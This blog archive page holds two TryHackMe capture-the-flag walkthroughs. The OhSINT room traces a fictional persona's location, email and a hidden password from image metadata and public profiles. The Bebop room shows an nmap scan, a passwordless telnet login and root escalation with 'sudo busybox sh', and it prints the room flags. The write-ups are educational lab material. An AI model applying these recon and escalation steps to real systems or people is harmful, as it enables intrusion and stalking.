Month: March 2025

Capture the Flag

TryHackMe Room Walkthrough: OhSINT

What the starting image looks like for the roomToday’s room is called OhSINT. It is another Free Room on TryHackMe, which means that anyone can follow along with me as long as you sign up for a free account. The point of this room is to show you some of the very basics of OSINT (Open-Source Intelligence), which is the process of gathering and analyzing publicly available information to gain insights and intelligence on a subject or target.

Note: This room was updated 2/1/2024, so this walkthrough will probably be different from others if you’re Googling around and found someone who did it closer to release date. This is noted in the room itself.

In this one, we only have an image to go off of. Let’s start with the basics and read the metadata on the image.

$ exiftool WindowsXP_1551719014755.jpg
ExifTool Version Number         : 13.00
File Name                       : WindowsXP_1551719014755.jpg
Directory                       : .
File Size                       : 234 kB
File Modification Date/Time     : 2025:03:08 15:53:27-05:00
File Access Date/Time           : 2025:03:08 15:54:52-05:00
File Inode Change Date/Time     : 2025:03:08 15:54:52-05:00
File Permissions                : -rw-r--r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
XMP Toolkit                     : Image::ExifTool 11.27
GPS Latitude                    : 54 deg 17' 41.27" N
GPS Longitude                   : 2 deg 15' 1.33" W
Copyright                       : OWoodflint
Image Width                     : 1920
Image Height                    : 1080
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 1920x1080
Megapixels                      : 2.1
GPS Latitude Ref                : North
GPS Longitude Ref               : West
GPS Position                    : 54 deg 17' 41.27" N, 2 deg 15' 1.33" W

Question 1

Searching for the user that has the copyright, “OWoodflint”, I found this Twitter/X profile here.

What is this user’s avatar of?Cat

Question 2

In this person’s tweets, they have one that says:

From my house I can get free wifi ;D

Bssid: B4:5D:50:AA:86:41 - Go nuts!

BSSID is “Basic Service Set Identifier” and is a unique ID to identify a wifi access point.

If I search bssid lookup, the first result is WiGLE: Wireless Network Mapping at https://wigle.net. Okay, let’s check that out. I put the BSSID in the search on the right of the page and hit Filter and my map didn’t change (except all of the dots that had been on there are now gone). My guess was maybe this left *ONLY* that network on the map, so I zoomed all the way out and saw a dot in Europe. I zoomed in and it is in London. This could be me not knowing how to use the site, but it worked.

What city is this person in?London

Question 3

Same site, just get the info of that point.

What is the SSID of the WAP he connected to?UnileverWiFi

Question 4

Back to googling the username. The first result for me was https://github.com/OWoodfl1nt/ I know people associate their emails on GitHub sometimes, so I went into there. In the readme of his people_finder project, it says “Project starting soon! Email me if you want to help out: OWoodflint@gmail.com”

What is his personal email address?OWoodflint@gmail.com

Question 5

What site did you find his email address on?GitHub

Question 6

I didn’t see anything about a holiday/vacation on X/Twitter or GitHub, so back to the google search. It also returns his blog at https://oliverwoodflint.wordpress.com/ His first – and apparently only – post has the answer.

Where has he gone on holiday?New York

Question 7

I actually found this one multiple places on the internet because of this challenge, but not the intended places. So I’m going to work this as intended. From google, basically I just have these three sites: X/Twitter, GitHub, and his blog. Since this is an OSINT challenge, I don’t expect they want us to try to crack his wordpress site. So, in true CTF-style thinking, I went looking for clues in his blog’s HTML source. I scrolled down and found this:

<p style="color:#ffffff;" class="has-text-color">pennYDr0pper.!</p>

Given the HTML, that would mean that it is actually on his site visible except that the text is the same color as the background. And sure enough:

An image showing that the password is actually on the blog post screen all along

What is the person’s password?pennYDr0pper.!

That’s it. Just a fun little very introductory primer on using search engines and social profiles to do some very basic OSINT and show you the beginning of what’s possible. Any questions, let me know.

Capture the Flag

TryHackMe Room Walkthrough: Bebop

An evil drone, representing the drone in this exerciseToday, we’re going work our way through another TryHackMe room called Bebop. This one isn’t in the Free Tier, but it is considered “Easy” and is a “Walkthrough Room” rather than a “Challenge Room”. Because of that, there will be some additional questions in addition to just posting User and Root flags. Getting started, the room description says, “Who thought making a flying shell was a good idea?”. For the first task, it reads, “For this mission, you have been assigned the codename ‘pilot’. Press the Start Machine button to make the drone takeoff!”.

Task 1

“Deploy the machine.”No answer needed
“What is your codename?”pilot

Task 2

With the machine started and enough time elapsed, I first ran an nmap scan to see what we were dealing with.

~# nmap -sCV -T4 10.10.194.21
Starting Nmap 7.80 ( https://nmap.org ) at 2025-03-05 16:25 GMT
Nmap scan report for 10.10.194.21
Host is up (0.0013s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.5 (FreeBSD 20170903; protocol 2.0)
| ssh-hostkey: 
|   2048 5b:e6:85:66:d8:dd:04:f0:71:7a:81:3c:58:ad:0b:b9 (RSA)
|   256 d5:4e:18:45:ba:d4:75:2d:55:2f:fe:c9:1c:db:ce:cb (ECDSA)
|_  256 96:fc:cc:3e:69:00:79:85:14:2a:e4:5f:0d:35:08:d4 (ED25519)
23/tcp open  telnet  BSD-derived telnetd
MAC Address: 02:D4:65:95:48:91 (Unknown)
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.44 seconds

So, ports 22 (SSH) and 23 (telnet) are open. SSH is rarely the initial way in without any other information, so let’s try telnet, remembering our username of pilot that they’ve already told us and then asked us about. Connecting, I was asked for a login and I typed pilot. This immediately got me to an interactive session. So, they meant Easy easy on this one.

root@ip-10-10-235-128:~# telnet 10.10.194.21
Trying 10.10.194.21...
Connected to 10.10.194.21.
Escape character is '^]'.
login: pilot
Last login: Sat Oct  5 23:48:53 from cpc147224-roth10-2-0-cust456.17-1.cable.virginm.net
FreeBSD 11.2-STABLE (GENERIC) #0 r345837: Thu Apr  4 02:07:22 UTC 2019

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

Edit /etc/motd to change this login announcement.
Want to strip UTF-8 BOM(Byte Order Mark) from given files?

	sed -e '1s/^\xef\xbb\xbf//' < bomfile > newfile
[pilot@freebsd ~]$ 

Doing an ls shows me that we can see the user.txt file in our directory and cat-ing it out gives us the first answer of Task 2.
Okay, so we’re already at a command prompt. No issues here.

[pilot@freebsd ~]$ ls
user.txt
[pilot@freebsd ~]$ cat user.txt
THM{r3m0v3_b3f0r3_fl16h7}

What is the User Flag?THM{r3m0v3_b3f0r3_fl16h7}

Moving on, we need to see what we can do to elevate our privileges to root to get the root flag. One of the first things I usually do is sudo -l to see what we can run as sudo. Since we didn’t use a password to log in, we didn’t know the password if there was one. Luckily, it didn’t ask us one to run this command.

[pilot@freebsd ~]$ sudo -l
User pilot may run the following commands on freebsd:
    (root) NOPASSWD: /usr/local/bin/busybox

Okay, so we can run the binary busybox with sudo as root with no password. Is that useful? This is where I check my favorite PrivEsc companion GTFOBins to see. You can find the entry for busybox here. Taking a small aside, busybox is a utility that you often find in embedded systems that contains its own implementations of things like ls, sh, mv, etc. In these systems, you can execute the commands by calling busybox {command}, or – quite often – the person who set up the system will symlink ls to just call busybox ls, like this: ln -s /bin/busybox /bin/ls, so you might not even know that busybox is involved. This would allow you to only have one binary instead of many, with an overall size savings.

In this case, that means if I call sudo busybox sh, I’ll get a shell opened as root, which is just what happened.

[pilot@freebsd ~]$ sudo busybox sh
# whoami
root

From there, we navigate to the root directory and cat out the file.

# cd /root
# ls
.bash_history	.history	.login		root.txt
.cshrc		.k5login	.profile
# cat root.txt
THM{h16hw4y_70_7h3_d4n63r_z0n3}

What is the Root Flag?THM{h16hw4y_70_7h3_d4n63r_z0n3}

Task 3

What is the low privilleged user?pilot
What binary was used to escalate privileges?busybox
What service was used to gain an initial shell?telnet

Last question, we already knew from what we saw in our nmap scan and also at the dump of information at our login prompt, but you can always check this way from within the system itself.

# uname -a
FreeBSD freebsd 11.2-STABLE FreeBSD 11.2-STABLE #0 r345837: Thu Apr  4 02:07:22 UTC 2019     root@releng2.nyi.freebsd.org:/usr/obj/usr/src/sys/GENERIC  amd64

What Operating System does the drone run?FreeBSD

That’s it. The most basic of rooms, but a pretty good entry point into some basic recon and basic PrivEsc if you’re new to this.